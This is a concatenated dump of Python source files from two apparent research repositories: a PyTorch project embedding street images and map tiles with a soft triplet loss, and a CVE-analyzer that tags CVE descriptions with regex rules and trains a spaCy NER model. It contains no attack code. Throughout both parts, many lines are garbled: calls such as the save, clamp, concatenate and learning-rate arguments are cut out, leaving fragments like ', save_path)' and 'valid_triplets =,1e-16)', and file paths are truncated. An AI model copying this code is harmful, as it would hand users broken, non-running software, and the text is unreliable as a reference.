imA) cv2.imshow("Panorama", imB) else: img = np.concatenate((imA, imB),axis=1) cv2.imshow("Location", img) cv2.waitKey(0) def __len__(self): """Return the total number of images in the dataset.""" return self.area.N ``` #### File: Image-Map-Embeddings/models/ ```python import os import torch import numpy as np from collections import OrderedDict from abc import ABC, abstractmethod from .utils import get_scheduler class BaseModel(ABC): """This class is an abstract base class (ABC) for models. To create a subclass, you need to implement the following five functions: -- <__init__>: initialize the class; first call BaseModel.__init__(self, opt). -- <set_input>: unpack data from dataset and apply preprocessing. -- <forward>: produce intermediate results. -- <optimize_parameters>: calculate losses, gradients, and update network weights. -- <modify_commandline_options>: (optionally) add model-specific options and set default options. """ def __init__(self, opt): """Initialize the BaseModel class. Parameters: opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions When creating your custom class, you need to implement your own initialization. In this function, you should first call <BaseModel.__init__(self, opt)> Then, you need to define five lists: -- self.loss_names (str list): specify the training losses that you want to plot and save. -- self.model_names (str list): define networks used in our training. -- self.visual_names (str list): specify the images that you want to display and save. -- self.optimizer_names (str list): list names of optimizers to be saved in disk -- self.optimizers (optimizer list): define and initialize optimizers. You can define one optimizer for each network. If two networks are updated at the same time, you can use itertools.chain to group them. See for an example. """ self.opt = opt self.gpu_ids = opt.gpu_ids self.isTrain = opt.isTrain self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device('cpu') # get device name: CPU or GPU self.save_dir = os.path.join(opt.checkpoints_dir, # save all the checkpoints to save_dir if opt.preprocess != 'scale_width': # with [scale_width], input images might have different sizes, which hurts the performance of cudnn.benchmark. torch.backends.cudnn.benchmark = True self.loss_names = [] self.model_names = [] self.visual_names = [] self.optimizer_names = [] self.optimizers = [] self.image_paths = [] self.metric = 0 # used for learning rate policy 'plateau' self.metric_value = None # Best metric self.total_iters = 0 self.epoch_iters = 0 # Set the seed if opt.seed != -1: np.random.seed(opt.seed) #torch.set_deterministic(True) torch.manual_seed(opt.seed) torch.cuda.manual_seed(opt.seed) torch.cuda.manual_seed_all(opt.seed) # if multi-GPU. torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False @staticmethod def modify_commandline_options(parser, is_train): """Add new model-specific options, and rewrite default values for existing options. Parameters: parser -- original option parser is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options. Returns: the modified parser. """ return parser @abstractmethod def set_input(self, input): """Unpack input data from the dataloader and perform necessary pre-processing steps. Parameters: input (dict): includes the data itself and its metadata information. """ pass @abstractmethod def forward(self): """Run forward pass; called by both functions <optimize_parameters> and <test>.""" pass @abstractmethod def optimize_parameters(self): """Calculate losses, gradients, and update network weights; called in every training iteration""" pass def setup(self, opt): """Load and print networks; create schedulers Parameters: opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions """ if self.isTrain: self.schedulers = [get_scheduler(optimizer, opt) for optimizer in self.optimizers] if not self.isTrain or opt.continue_train: load_suffix = 'iter_%d' % opt.load_iter if opt.load_iter > 0 else opt.epoch self.load_networks(load_suffix) self.print_networks(opt.verbose) def eval(self): """Make models eval mode during test time""" for name in self.model_names: if isinstance(name, str): net = getattr(self, 'net' + name) net.eval() def train(self): """Make model trainable""" for name in self.model_names: if isinstance(name, str): net = getattr(self, 'net' + name) net.train() def test(self): """Forward function used in test time. This function wraps <forward> function in no_grad() so we don't save intermediate steps for backprop It also calls <compute_visuals> to produce additional visualization results """ with torch.no_grad(): self.forward() self.compute_visuals() def compute_visuals(self): """Calculate additional output images for visdom and HTML visualization""" pass def get_image_paths(self): """ Return image paths that are used to load current data""" return self.image_paths def update_learning_rate(self): """Update learning rates for all the networks; called at the end of every epoch""" for scheduler in self.schedulers: if self.opt.lr_policy == 'plateau': scheduler.step(self.metric) else: scheduler.step() lr = self.optimizers[0].param_groups[0]['lr'] print('learning rate = %.7f' % lr) def get_current_visuals(self): """Return visualization images. will display these images with visdom, and save the images to a HTML""" visual_ret = OrderedDict() for name in self.visual_names: if isinstance(name, str): visual_ret[name] = getattr(self, name) return visual_ret def get_current_losses(self): """Return traning losses / errors. will print out these errors on console, and save them to a file""" errors_ret = OrderedDict() for name in self.loss_names: if isinstance(name, str): errors_ret[name] = float(getattr(self, 'loss_' + name)) return errors_ret def save_networks(self, prefix, epoch_count, epoch_iters=None, total_iters=None, metric_value=None): """Save all the networks and optimizers to the disk. It also saves the current iteration and optionally a performance metric. Parameters: prefix -- current epoch or any text prefix; used in the file name '%s_net_%s.pth' % (prefix, name) epoch_count -- current epoch epoch_iters -- count of current iterations in current epoch total_iters -- total count of iterations metric_value -- Metric value for current epoch (optional) """ # save networks for name in self.model_names: if isinstance(name, str): save_filename = '%s_net_%s.pth' % (prefix, name) save_path = os.path.join(self.save_dir, save_filename) net = getattr(self, 'net' + name) if isinstance(net, torch.nn.DataParallel): state_dict = net.module.state_dict() else: state_dict = net.state_dict() ckpt = {'epoch_iters': epoch_iters, 'total_iters': total_iters, 'last_epoch': epoch_count, 'metric_value': metric_value, 'model_state_dict': state_dict, } if len(self.gpu_ids) > 0 and torch.cuda.is_available():, save_path) else:, save_path) # Save optimizers for name in self.optimizer_names: if isinstance(name, str): save_filename = '%s_optimizer_%s.pth' % (prefix, name) save_path = os.path.join(self.save_dir, save_filename) optimizer = getattr(self, 'optimizer_' + name) ckpt = {'epoch_iters': epoch_iters, 'total_iters': total_iters, 'last_epoch': epoch_count, 'metric_value': metric_value, 'optimizer_state_dict': optimizer.state_dict(), } if len(self.gpu_ids) > 0 and torch.cuda.is_available():, save_path) else:, save_path) def load_networks(self, prefix): """Load all the networks and optimizers (if training) from the disk. It also loads the current iteration and a performance metric. Parameters: prefix -- current epoch or any text prefix; used in the filename '%s_net_%s.pth' % (prefix, name) """ for name in self.model_names: if isinstance(name, str): load_filename = '%s_net_%s.pth' % (prefix, name) load_path = os.path.join(self.save_dir, load_filename) if os.path.isfile(load_path): net = getattr(self, 'net' + name) if isinstance(net, torch.nn.DataParallel): net = net.module # Load checkpoint ckpt = torch.load(load_path, map_location=str(self.device)) epoch_count = ckpt['last_epoch'] self.opt.epoch_count = epoch_count if prefix == 'latest' else epoch_count + 1 self.epoch_iters = 0 #ckpt['epoch_iters'] self.total_iters = ckpt['total_iters'] if self.isTrain: self.metric_value = ckpt['metric_value'] if self.opt.initial_metric_value is None else self.opt.initial_metric_value else: self.metric_value = ckpt['metric_value'] net.load_state_dict(ckpt['model_state_dict']) print('loaded the model from %s, n_epoch: %s num_iters: %s' % (load_path,epoch_count,self.total_iters)) else: print("Warning file {} not found".format(load_path)) # Load optimizers if self.isTrain: for name in self.optimizer_names: if isinstance(name, str): load_filename = '%s_optimizer_%s.pth' % (prefix, name) load_path = os.path.join(self.save_dir, load_filename) if os.path.isfile(load_path): optimizer = getattr(self, 'optimizer_' + name) # Load checkpoint ckpt = torch.load(load_path, map_location=str(self.device)) optimizer.load_state_dict(ckpt['optimizer_state_dict']) print('loaded the optimizer from %s' % load_path) else: print("Warning file {} not found".format(load_path)) def print_networks(self, verbose): """Print the total number of parameters in the network and (if verbose) network architecture Parameters: verbose (bool) -- if verbose: print the network architecture """ print('---------- Networks initialized -------------') for name in self.model_names: if isinstance(name, str): net = getattr(self, 'net' + name) num_params = 0 for param in net.parameters(): num_params += param.numel() if verbose: print(net) print('[Network %s] Total number of parameters : %.3f M' % (name, num_params / 1e6)) print('-----------------------------------------------') def set_requires_grad(self, nets, requires_grad=False): """Set requies_grad=Fasle for all the networks to avoid unnecessary computations Parameters: nets (network list) -- a list of networks requires_grad (bool) -- whether the networks require gradients or not """ if not isinstance(nets, list): nets = [nets] for net in nets: if net is not None: for param in net.parameters(): param.requires_grad = requires_grad ``` #### File: models/nets/ ```python import torch import torch.nn as nn class softTriplet(nn.Module): def __init__(self, alpha, squared, device): super(softTriplet, self).__init__() self.alpha = alpha self.squared = squared self.device = device def _pairwise_distances(self, X,Y): dot_product = torch.matmul(X,torch.t(Y)) X_norm = torch.norm(X,p=2, dim=1, keepdim=True) Y_norm = torch.norm(Y,p=2, dim=1, keepdim=True) # Compute the pairwise distance matrix as we have: # ||a - b||^2 = ||a||^2 - 2 <a, b> + ||b||^2 # shape (batch_size, batch_size) distances = torch.pow(X_norm,2) - 2.0 * dot_product + torch.pow(torch.t(Y_norm),2) # Because of computation errors, some distances might be negative so we put everything >= 0.0 distances = torch.max(distances, torch.zeros_like(distances)) if not self.squared: # Because the gradient of sqrt is infinite when distances == 0.0 (ex: on the diagonal) # we need to add a small epsilon where distances == 0.0 mask = torch.eq(distances, 0.0).float() distances = distances + mask * 1e-16 distances = torch.sqrt(distances) # # Correct the epsilon added: set the distances on the mask to be exactly 0.0 distances = distances * (1.0 - mask) return distances def _get_same_label_mask(self, labels): """Return a 2D mask where mask[a, p] is True if a and p have same label. Args: labels: tf.int32 `Tensor` with shape [batch_size] Returns: mask: tf.bool `Tensor` with shape [batch_size, batch_size] """ labels = labels.expand(labels.shape[0],labels.shape[0]) labels_equal = torch.eq(labels, labels.t()) return labels_equal def _get_anchor_positive_triplet_mask(self, labels): """Return a 2D mask where mask[a, p] is True iff a and p are distinct and have same label. Args: labels: tf.int32 `Tensor` with shape [batch_size] Returns: mask: tf.bool `Tensor` with shape [batch_size, batch_size] """ indices_equal = torch.eye(labels.size()[0], device=self.device).byte() # There is going to be an issue here in a future indices_not_equal = ~ indices_equal labels_equal = self._get_same_label_mask(labels) mask = indices_not_equal & labels_equal return mask def _get_anchor_negative_triplet_mask(self, labels): """Return a 2D mask where mask[a, n] is True iff a and n have distinct labels. Args: labels: tf.int32 `Tensor` with shape [batch_size] Returns: mask: tf.bool `Tensor` with shape [batch_size, batch_size] """ # Check if labels[i] != labels[k] # Uses broadcasting where the 1st argument has shape (1, batch_size) and the 2nd (batch_size, 1) labels_equal = self._get_same_label_mask(labels) mask = ~ labels_equal return mask def _get_X_Y_triplet_mask(self, labels): """Return a 3D mask where mask[a, p, n] is True if the triplet (a, p, n) is valid. Triplet (Xi, Yj, Yk) is valid if: labels[i] == labels[j] and labels[i] != labels[k] Args: labels: tf.int32 `Tensor` with shape [batch_size] """ same_label_mask = self._get_same_label_mask(labels) li_equal_lj = same_label_mask.expand(1,labels.size()[0], labels.size()[0]).permute(2,1,0) lj_not_equal_lk = ~ li_equal_lj.permute(2,1,0) valid_triplet_mask = li_equal_lj & lj_not_equal_lk return valid_triplet_mask def _get_triplet_mask(self, labels): """Return a 3D mask where mask[a, p, n] is True if the triplet (a, p, n) is valid. Triplet (Xi, Xj, Xk) is valid if: i != j != k labels[i] == labels[j] and labels[i] != labels[k] Args: labels: tf.int32 `Tensor` with shape [batch_size] """ # Indices mask i_not_equal_j = ~torch.eye(labels.size()[0], device=self.device).expand(labels.size()[0],labels.size()[0],labels.size()[0]).bool().permute(2,1,0) # Labels mask same_label_mask = self._get_same_label_mask(labels) li_equal_lj = same_label_mask.expand(1,labels.size()[0], labels.size()[0]).permute(2,1,0) lj_not_equal_lk = ~li_equal_lj.permute(2,1,0) valid_triplet_mask = (li_equal_lj & lj_not_equal_lk) & i_not_equal_j return valid_triplet_mask def batchall(self, X,labels,final_strategy): pairwise_dist = self._pairwise_distances(X,X).expand(1,labels.size()[0],labels.size()[0]) # Compute a tensor with all the posible triplets anchor_positive_dist = pairwise_dist.permute(1,2,0) #[4,4,1] anchor_negative_dist = pairwise_dist.permute(1,0,2) # triplet_loss[i, j, k] will contain the triplet loss of anchor=i, positive=j, negative=k triplet_loss_tensor = torch.log( 1 + torch.exp( self.alpha * (anchor_positive_dist - anchor_negative_dist))) triplet_loss = torch.mul(triplet_loss_tensor, self._get_triplet_mask(labels).float()) # Count the number of valid triplets (where triplet loss> 0) valid_triplets =,1e-16).sum() # Get the final mean triplet loss over all valid triplets if final_strategy == "mean": loss = triplet_loss.sum() / (valid_triplets + 1e-16) return loss elif final_strategy is "mean_all": loss = triplet_loss.mean() return loss elif final_strategy is "sum": loss = triplet_loss.sum() return loss else: print("Final strategy not found") def batch_all_X_Y(self, X, Y, labels,final_strategy): pairwise_dist = self._pairwise_distances(X,Y).expand(1, labels.size(0), labels.size(0)) # Compute a tensor with all the posible triplets anchor_positive_dist = pairwise_dist.permute(1,2,0) #[4,4,1] anchor_negative_dist = pairwise_dist.permute(1,0,2) # triplet_loss[i, j, k] will contain the triplet loss of anchor=i, positive=j, negative=k triplet_loss_tensor = torch.log(1 + torch.exp( self.alpha * (anchor_positive_dist - anchor_negative_dist))) triplet_loss = torch.mul(triplet_loss_tensor, self._get_X_Y_triplet_mask(labels).float()) # Count the number of valid triplets (where triplet loss> 0) valid_triplets =,1e-16).sum() # Get the final mean triplet loss over all valid triplets if final_strategy == "mean": loss = triplet_loss.sum() / (valid_triplets + 1e-16) return loss elif final_strategy is "mean_all": loss = triplet_loss.mean() return loss elif final_strategy is "sum": loss = triplet_loss.sum() return loss else: print("Final strategy not found") def batch_hard_X_Y(self, X, Y, labels): pairwise_distances = self._pairwise_distances(X,Y) # Valid anchor positives x-y have same label anchor_positive_distance = torch.mul(pairwise_distances, self._get_same_label_mask(labels).float()) hardest_positive_distance, _ = torch.max(anchor_positive_distance, dim=1) # Valid anchor negatives x-y have different label anchor_negative_distance = torch.mul(pairwise_distances, 1.0 - self._get_anchor_negative_triplet_mask(labels).float()) max_anchor_negative_dist, _ = torch.max(pairwise_distances, dim=1, keepdim=True) anchor_negative_dist = pairwise_distances + max_anchor_negative_dist * self._get_anchor_positive_triplet_mask(labels).float() hardest_negative_distance, _ = torch.min(anchor_negative_dist, dim=1, keepdim=True) triplet_loss = (hardest_positive_distance - hardest_negative_distance).mean() triplet_loss = torch.log( 1 + torch.exp( self.alpha * ( (hardest_positive_distance - hardest_negative_distance).mean() ))) return triplet_loss def batch_hard(self, X, labels): pairwise_distances = self._pairwise_distances(X,X) # Valid anchor positives have same label and i != j anchor_positive_distance = torch.mul(pairwise_distances, self._get_anchor_positive_triplet_mask(labels).float()) hardest_positive_distance, _ = torch.max(anchor_positive_distance, dim=1) # Valid anchor negatives x-y have different label anchor_negative_distance = torch.mul(pairwise_distances, 1.0 - self._get_anchor_negative_triplet_mask(labels).float()) max_anchor_negative_dist, _ = torch.max(pairwise_distances, dim=1, keepdim=True) anchor_negative_dist = pairwise_distances + max_anchor_negative_dist * self._get_anchor_positive_triplet_mask(labels).float() hardest_negative_distance, _ = torch.min(anchor_negative_dist, dim=1, keepdim=True) triplet_loss = torch.log( 1 + torch.exp( self.alpha * ( (hardest_positive_distance - hardest_negative_distance).mean() ))) return triplet_loss class SoftTripletLoss(softTriplet): def __init__(self, cfg, device): super(SoftTripletLoss, self).__init__(cfg.alpha, False, device) self.cfg = cfg self.device = device def batch_all(self, X,Y,Labels, final_strategy): l1 = super().batch_all_X_Y(X,Y,Labels,final_strategy) l2 = super().batch_all_X_Y(Y,X,Labels,final_strategy) l3 = super().batchall(X,Labels,final_strategy) l4 = super().batchall(Y,Labels,final_strategy) return l1, l2, l3, l4 def batch_hard(self, X,Y,Labels, final_strategy): l1 = super().batch_hard_X_Y(X,Y,Labels) l2 = super().batch_hard_X_Y(Y,X,Labels) l3 = super().batch_hard(X,Labels) l4 = super().batch_hard(Y,Labels) return l1, l2, l3, l4 ``` #### File: Image-Map-Embeddings/models/ ```python import torch import itertools import torch.nn.functional as F from .base_model import BaseModel from .nets.street2vec_nets import define_netX, define_netY, define_netEMBX, define_netEMBY from .nets.softtriplet import SoftTripletLoss class Street2VecModel(BaseModel): """ This class implements the network for embedding images and map tiles It expect as input a dictionary with images from two domains X and Y. """ @staticmethod def modify_commandline_options(parser, is_train=True): """Add new dataset-specific options, and rewrite default values for existing options. Parameters: parser -- original option parser is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options. Returns: the modified parser. """ parser.add_argument('--embedding_dim', type=int, default=16, help='Dimension size in the embedding space') parser.add_argument('--scale', type=int, default=32, help='Radius of the hypersphere') parser.add_argument('--no_l2_norm', action='store_true', help='Disable l2-norm') parser.add_argument('--alpha', type=float, default=0.2, help='For soft triplet loss') if is_train: parser.set_defaults(batch_size=15,n_epochs=30, n_epochs_decay=20, lr=0.00004) parser.add_argument('--l1', type=float, default=1.0, help='Lambda 1 factor for loss function') parser.add_argument('--l2', type=float, default=1.0, help='Lambda 2 factor for loss function') parser.add_argument('--l3', type=float, default=1.0, help='Lambda 3 factor for loss function') parser.add_argument('--l4', type=float, default=1.0, help='Lambda 4 factor for loss function') else: parser.set_defaults(batch_size=15, eval=True) return parser def __init__(self, opt): """Initialize the class. Parameters: opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions """ BaseModel.__init__(self, opt) if self.opt.isTrain and len(opt.domain) == 1: raise AssertionError('Street2vec model requeres two domains, only {} was given'.format(opt.domain)) self.loss_names = ['l1', 'l2', 'l3', 'l4', 'soft'] self.visual_names = ['X','Yf','Yl','Yr','Yb'] if opt.panorama_mode == 'list' else ['X_thumbnail', 'Y_thumbnail'] # Define networks self.model_names = ['X','Y', 'EMBX','EMBY'] self.netX = define_netX(opt) self.netY = define_netY(opt) self.netEMBX = define_netEMBX(opt) self.netEMBY = define_netEMBY(opt) if self.opt.isTrain: parameters = [] for net_name in self.model_names: net = getattr(self, 'net'+net_name) parameters.append(net.parameters()) self.optimizer_names = ['O'] self.optimizer_O = torch.optim.Adam(itertools.chain(*parameters),, betas=(opt.beta1, 0.999)) self.optimizers = [self.optimizer_O] self.criterion = SoftTripletLoss(self.opt, self.device) def set_input(self, sample): """Unpack sample data from the dataloader and perform necessary pre-processing steps. The data can be in either of the following formats - when opt.panorama_mode is list -> Parameters: sample (dict): include the data itself and its metadata information. """ X = sample[self.opt.domain[0]].to(self.device) Y = sample[self.opt.domain[1]].to(self.device) self.X = X.view(-1, 3, X.size(3), X.size(4)) # X - > [batch_size, num_augmentations, num_channels, width, heigth] if self.opt.panorama_mode == 'list': # Y -> [batch_size, num_augmentations, snaps*, num_channels, width, heigth] self.Yf = Y[:,:,0,:,:,:].view(-1,3,Y.size(4), Y.size(5)) self.Yl = Y[:,:,1,:,:,:].view(-1,3,Y.size(4), Y.size(5)) self.Yr = Y[:,:,2,:,:,:].view(-1,3,Y.size(4), Y.size(5)) self.Yb = Y[:,:,3,:,:,:].view(-1,3,Y.size(4), Y.size(5)) else: # Y - > [batch_size, num_augmentations, num_channels, width, heigth] self.Y = Y.view(-1, 3, Y.size(3), Y.size(4)) self.Y_thumbnail = F.interpolate(self.Y, size=128).detach() # For visualization self.X_thumbnail = F.interpolate(self.X, size=128).detach() # For visualization self.index = sample['index'] self.labels = sample['labels'].to(self.device).view(-1) self.N = self.opt.batch_size*self.opt.num_augmentations def forward(self): """Run forward pass; called by both functions <optimize_parameters> and <test>.""" self.X_f = self.netX(self.X) self.X_d = self.X_f.view(self.X_f.size(0),-1) if self.opt.panorama_mode == 'list': self.Y_flist = [self.netY(getattr(self, name)) for name in ['Yf','Yl','Yr','Yb']] self.Y_dlist = [Y.view(Y.size(0),-1) for Y in self.Y_flist] self.Y_d =,dim=1) else: self.Y_f = self.netY(self.Y) self.Y_d = self.Y_f.view(self.Y_f.size(0),-1) self.X_o = self.netEMBX(self.X_d) self.Y_o = self.netEMBY(self.Y_d) def backward(self): """Calculate loss""" self.loss_l1, self.loss_l2, self.loss_l3, self.loss_l4 = self.criterion.batch_all(self.X_o, self.Y_o, self.labels, 'mean') self.loss_soft = self.opt.l1 * self.loss_l1 + self.opt.l2 * self.loss_l2 + self.opt.l3 * self.loss_l3 + self.opt.l4 * self.loss_l4 self.loss_soft.backward() def optimize_parameters(self): self.forward() self.optimizer_O.zero_grad() self.backward() self.optimizer_O.step() def compute_visuals(self, writer, total_iters): visuals = self.get_current_visuals() images = [] vnames = '' for key in visuals: mean = torch.Tensor([0.5, 0.5, 0.5]).view(1,3,1,1).to(self.device) std = torch.Tensor([0.5, 0.5, 0.5]).view(1,3,1,1).to(self.device) v = visuals[key]*std + mean images.append(v[0]) vnames += '-' + key images = torch.stack(images,0) writer.add_images(vnames, images, global_step=total_iters) ``` #### File: Image-Map-Embeddings/options/ ```python import argparse import localizer from .base_options import BaseOptions class LocalizeOptions(BaseOptions): """This class includes test options. It also includes shared options defined in BaseOptions. """ def initialize(self, parser): parser = BaseOptions.initialize(self, parser) parser.set_defaults(phase='localize') parser.add_argument('--results_dir', type=str, default='./results/', help='saves results here.') parser.add_argument('--steps', type=int, default = None, help='Number of steps') parser.add_argument('--visualize', action='store_true', help='If set a figure displaying current state will be produced at each step') parser.add_argument('--nosave', action='store_true', help='If set save experiment information') self.isTrain = False return parser ``` #### File: Image-Map-Embeddings/utils/ ```python import numpy as np from sklearn.metrics import pairwise_distances import matplotlib.pyplot as plt class NumpyMetrics(): def __init__(self, metric='euclidean'): self.metric = metric def rank(self, x,y, x_labels, y_labels): distances = pairwise_distances(x,y,self.metric) batch_size = x_labels.shape[0] sorted_distances_indices = np.argsort(distances, axis=1) labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size)) retrived_labels = np.take(labels_matrix, sorted_distances_indices) labels_equal = np.equal(np.expand_dims(y_labels,axis=1), retrived_labels) rank = np.argmax(labels_equal.astype(float), axis=1) + 1 return rank def elements_by_class(self, x_labels): '''Count the total of elements of each class in the eval set Return unique_labels -> A numpy array with the index of the labels count -> Number of elements of each class in the test set ''' unique_labels = np.unique(x_labels) # Make and array of unique labels label_matrix = np.equal(np.expand_dims(unique_labels, axis=1), np.expand_dims(x_labels, axis=0)) #shape [No.classes,1],[1,Eval_size] -> [No_classes,Eval_size] count = label_matrix.sum(axis=1) return unique_labels,count def true_positives(self, distances, x_labels, y_labels, k): ''' Find the k nearest y given x, then check if the label of y correnspond to x, and accumulate. ''' sorted_distances_indices = np.argsort(distances,axis=1) # batch_size = x_labels.shape[0] labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size)) # True label matrix retrieved_labels = np.take(labels_matrix,sorted_distances_indices) #The sorted retrieved labels matrix labels_equal = np.equal(np.expand_dims(y_labels, axis=1), retrieved_labels) # Where the retrieved label == true label tp = np.sum(labels_equal[:,0:k], axis=1) # Aparece cuando debe aparecer return tp def false_negative(self, distances, x_labels, y_labels, k): sorted_distances_indices = np.argsort(distances,axis=1) # batch_size = x_labels.shape[0] labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size)) # True label matrix retrieved_labels = np.take(labels_matrix,sorted_distances_indices) #The sorted retrieved labels matrix labels_equal = np.equal(np.expand_dims(y_labels, axis=1), retrieved_labels) # Where the retrieved label == true label fn = np.sum(labels_equal[:,k:], axis=1) return fn def false_positives(self, distances, x_labels, y_labels, k): 'Estan y no deberian estar' sorted_distances_indices = np.argsort(distances,axis=1) # batch_size = x_labels.shape[0] labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size)) # True label matrix retrieved_labels = np.take(labels_matrix,sorted_distances_indices) #The sorted retrieved labels matrix labels_equal = np.equal(np.expand_dims(y_labels, axis=1), retrieved_labels) # Where the retrieved label == true label labels_not_equal = np.logical_not(labels_equal) fp = np.sum(labels_not_equal[:,0:k], axis=1) return fp def precision_at_k(self, x,y, x_labels, y_labels, k): ''' The ability of a classificator model to identify only the relevant points. Precision = true_positives /(true_positives + false_positives) ''' distances = pairwise_distances(x,y,self.metric) tp = self.true_positives(distances, x_labels, y_labels, k) #fp = self.false_positives(distances, x_labels, y_labels, k) fn = self.false_negative(distances, x_labels, y_labels, k) fp = np.minimum(k - tp, fn) precision_at_k = tp / (tp + fp) return precision_at_k def recall_at_k(self, x, y, x_labels, y_labels, k): ''' Percentage of total relevant results correctly classified by the algorithm The ability of a model to find all relevant cases within a dataset. Recall = true_positives / (true_positives + false_negatives) The ability of the model to retrieve a relevenat pair of one domain given a query of the other domain ''' distances = pairwise_distances(x,y,self.metric) tp = self.true_positives(distances, x_labels, y_labels, k) fn = self.false_negative(distances, x_labels, y_labels, k) fn = np.minimum(fn,k-tp) recall_at_k = tp / (tp + fn) return recall_at_k def average_rank_at_k(self, x, y, labels): rank = self.rank(x,y,labels, labels) for k in [1,5,10,20,50,100,500,5000]: percentage = (rank <= k).sum() / x.shape[0] print(' Top {:.3f}, {:.3f}'.format(k,percentage)) def rank_curve(self, x, y, labels): rank = self.rank(x,y,labels,labels) print("Average rank", rank.mean()) count_percentage = np.zeros((x.shape[0]), dtype=float) for i in range(x.shape[0]): count_percentage[i] = (rank <= i+1).sum() / x.shape[0] plt.plot(count_percentage) plt.waitforbuttonpress() ```
{ "source": "0berry/CVE-analyzer", "score": 3 }
#### File: 0berry/CVE-analyzer/ ```python import csv import json import sys import re import en_core_web_lg def usage(): print 'usage: python <path_to_dataset_in_csv> <output_file>' def _get_annotations(desc, pattern, label): regex = re.compile(pattern) return [(match.start(), match.start() + len(, label) for match in regex.finditer(desc)] # ------------------- ANNOTATION RULES ------------------- def find_functions(desc): pattern = r'[a-zA-Z0-9]+(_[a-zA-Z0-9]+)+' return _get_annotations(desc, pattern, "FUNCTION") def find_kernel_version(desc): pattern = r'\d+(\.\d+)+(-?)(\w+)?' return _get_annotations(desc, pattern, "VERSION") def find_file_path(desc): pattern = r'(/)?\w+(/\w+)+\.c' return _get_annotations(desc, pattern, "SOURCECODE") def find_fd_driver(desc): pattern = r'(/)?\w+(/\w+(?!\.c))+' return _get_annotations(desc, pattern, "DRIVER") def find_driver(desc): pattern = r'[a-zA-Z]+\s[a-zA-Z\-]+\s(?=driver)' return _get_annotations(desc, pattern, "DRIVER") def find_structs(desc): pattern = r'(?<=struct\s)\w+(\s\w+)' return _get_annotations(desc, pattern, "STRUCT") # ------------------- END ANNOTATION RULES ------------------- TAGGERS = [ find_functions, find_kernel_version, find_file_path, find_driver, find_structs, find_fd_driver ] def annotate_NER(dataset_file): TRAIN_DATA = [] with open(dataset_file, 'r') as cve_dataset_f: # cve_reader = csv.DictReader(cve_dataset_f, delimiter=';') for cve in cve_dataset_f: entities = [] for tagger in TAGGERS: entities += tagger(cve) TRAIN_DATA += [[cve, {'entities': entities}]] with open('annotated_{}_NER_train.json'.format(dataset_file.replace('.csv', '')), 'w') as annotated_f: json.dump(TRAIN_DATA, annotated_f) def annotate_DEP(dataset_file): TRAIN_DATA = [] model = en_core_web_lg.load() with open(dataset_file, 'r') as cve_dataset_f: cve_reader = csv.DictReader(cve_dataset_f, delimiter=';') for cve in cve_reader: tagged_desc = model(unicode(cve['Avail.'])) heads = [tok.head.i for tok in tagged_desc] deps = ['-']*len(heads) TRAIN_DATA += [[cve['Avail.'], {'heads': heads, 'deps': deps}]] with open('annotated_{}_DEP_train.json'.format(dataset_file.replace('.csv', '')), 'w') as annotated_f: json.dump(TRAIN_DATA, annotated_f) def main(dataset_file): annotate_NER(dataset_file) # annotate_DEP(dataset_file) if __name__ == '__main__': if len(sys.argv) <= 1: usage() sys.exit(0) main(sys.argv[1]) ``` #### File: CVE-analyzer/cve_analyzer/ ```python import os import logging import json import random from pathlib import Path import spacy from spacy.util import minibatch, compounding from collections import defaultdict log = logging.getLogger('CVE_Analyzer') # ------------------------ PERFORMANCES ------------------------ def _compute_performances(performaces, annotations, entities): predictions = [[ent.start_char, ent.end_char, ent.label_] for ent in entities] for entry in annotations + predictions: if entry in annotations and entry in predictions: performaces["tp"] += 1 elif entry in annotations and entry not in predictions: performaces["fn"] += 1 elif entry not in annotations and entry in predictions: performaces["fp"] += 1 else: performaces['tn'] += 1 def _compute_precision(performaces): return float(performaces["tp"]) / (performaces["tp"] + performaces["fp"]) def _compute_recall(performaces): return float(performaces["tp"]) / (performaces["tp"] + performaces["fn"]) def _compute_f_measure(precision, recall): return 2*precision*recall / (precision + recall) def _compute_accuracy(performaces): return float((performaces['tp'] + performaces['tn'])) / \ float((performaces['tp'] + performaces['tn'] + performaces['fp'] + performaces['fn'])) def _get_dataset(dataset_path): if not os.path.exists(dataset_path): raise OSError("Dataset file {} not found".format(dataset_path)) with open(dataset_path, 'r') as dataset_f: dataset = json.load(dataset_f) return dataset def _get_ner_component(nlp): # Add entity recognizer to model if it's not in the pipeline # nlp.create_pipe works for built-ins that are registered with spaCy if 'ner' not in nlp.pipe_names: ner = nlp.create_pipe('ner') nlp.add_pipe(ner) # otherwise, get it, so we can add labels to it else: ner = nlp.get_pipe('ner') return ner # ------------------------ EXPORTED METHODS ------------------------ def get_train_and_test_sets(dataset_file, split_ratio): dataset = _get_dataset(dataset_file) random.shuffle(dataset) split = int(len(dataset)*split_ratio) return dataset[:split], dataset[split:] def pp_performances(accuracy, precision, recall, f_measure): print("\n-------------------------------------------") print("PERFORMANCES:") print("\nAccuracy: {}".format(accuracy)) print("Precision: {}".format(precision)) print("Recall: {}".format(recall)) print("F-measure: {}".format(f_measure)) print("\n-------------------------------------------") def save_model(output_dir, model_name, nlp): output_dir = Path(output_dir) if not output_dir.exists(): output_dir.mkdir(parents=True, exist_ok=True) nlp.meta['name'] = model_name nlp.to_disk(output_dir) log.debug("Saved model to %s", output_dir) def get_model(model_path): return spacy.load(model_path) def test(nlp, testset): performances = { "tp": 0, "fp": 0, "fn": 0, "tn": 0 } for description, annotations in testset: doc = nlp(description) _compute_performances(performances, annotations['entities'], doc.ents) performances['accuracy'] = _compute_accuracy(performances) performances['precision'] = _compute_precision(performances) performances['recall'] = _compute_recall(performances) performances['f_measure'] = _compute_f_measure(performances['precision'], performances['recall']) return performances def train(trainset, labels, n_iter, drop_rate): nlp = spacy.blank('en') ner = _get_ner_component(nlp) for label in labels: ner.add_label(label) optimizer = nlp.begin_training() # get names of other pipes to disable them during training other_pipes = [pipe for pipe in nlp.pipe_names if pipe != 'ner'] with nlp.disable_pipes(*other_pipes): # only train NER for _ in range(n_iter): random.shuffle(trainset) losses = {} # batch up the examples using spaCy's minibatch batches 